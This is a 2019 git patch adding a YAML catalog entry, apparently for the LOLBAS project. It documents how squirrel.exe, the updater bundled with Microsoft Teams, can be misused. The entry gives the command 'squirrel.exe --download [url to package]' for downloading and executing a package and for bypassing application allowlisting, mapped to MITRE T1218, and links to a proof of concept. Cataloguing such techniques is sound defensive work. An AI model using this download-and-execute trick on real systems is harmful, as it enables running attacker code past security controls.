From c96d22b345ca60cfc9fbdb9142556816f4d9a829 Mon Sep 17 00:00:00 2001
From: jreegun <jreegun@gmail.com>
Date: Thu, 27 Jun 2019 20:22:35 +0800
Subject: [PATCH] Create squirrel.yml

---
 yml/OtherMSBinaries/squirrel.yml | 47 ++++++++++++++++++++++++++++++++
 1 file changed, 47 insertions(+)
 create mode 100644 yml/OtherMSBinaries/squirrel.yml

diff --git a/yml/OtherMSBinaries/squirrel.yml b/yml/OtherMSBinaries/squirrel.yml
new file mode 100644
index 0000000..a653f3a
--- /dev/null
+++ b/yml/OtherMSBinaries/squirrel.yml
@@ -0,0 +1,47 @@
+Name: squirrel.exe
+Description: Binary to update the existing installed Nuget/squirrel package
+Author: User
+Created: Installed date
+Commands:
+  - Command: squirrel.exe --download [url to package]
+    Description: The above binary will go that particular location and look for RELEASES file and download the nuget package.
+    Usecase: Download and execute binary
+    Category: Execute
+    Privileges: User Privilege
+    MitreID: T1218 
+    MitreLink: https://attack.mitre.org/techniques/T1218/
+    OperatingSystem: Windows OS
+  - Command: squirrel.exe --download [url to package]
+    Description: The above binary will go that particular location and look for RELEASES file and download the nuget package.
+    Usecase: Download and execute binary
+    Category: AWL Bypass
+    Privileges: User Privilege
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/techniques/T1218/
+    OperatingSystem: Windows 10
+  - Command: squirrel.exe --download [url to package]
+    Description: The above binary will go that particular location and look for RELEASES file and download the nuget package.
+    Usecase: Download and execute binary
+    Category: Download
+    Privileges: User Privilege
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/techniques/T1218/
+    OperatingSystem: Windows 10
+Full_Path:
+- Path: NA
+- Path: %localappdata%\Microsoft\Teams\current\Squirrel.exe
+Code_Sample: 
+- Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
+Detection: 
+- IOC: NA
+- IOC: NA
+Resources:
+ - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls
+ - Link: https://twitter.com/reegun21/status/1144182772623269889
+ - Link: NA
+ Acknowledgement:
+  - Person: Reegun J (OCBC Bank)
+    Handle: @reegun21
+  - Person: NA
+    Handle: NA
+---